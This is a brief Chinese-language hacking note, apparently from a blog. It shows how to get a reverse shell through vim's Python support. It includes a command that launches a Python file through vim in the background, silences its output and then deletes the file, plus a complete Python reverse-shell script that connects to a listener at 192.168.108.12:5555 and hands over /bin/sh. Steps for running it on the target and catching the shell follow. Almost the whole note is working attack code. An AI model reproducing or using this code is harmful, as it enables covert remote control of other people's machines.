$(nohup vim -E -c "py3file demo.py"> /dev/null 2>&1 &) && sleep 2 && rm -f demo.py
複制
檢視 Ubuntu 16.04 的 vim 支援情況
反彈shell代碼
import socket, subprocess, os;
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
s.connect(("192.168.108.12", 5555));
os.dup2(s.fileno(), 0);
os.dup2(s.fileno(), 1);
os.dup2(s.fileno(), 2);
p = subprocess.call(["/bin/sh", "-i"]);
複制
靶機 執行 vim -E -c "py3file 1.py"
實體機 監聽5555端口并擷取反彈的shell
參考文章:
https://youtu.be/kahNGFF2AU8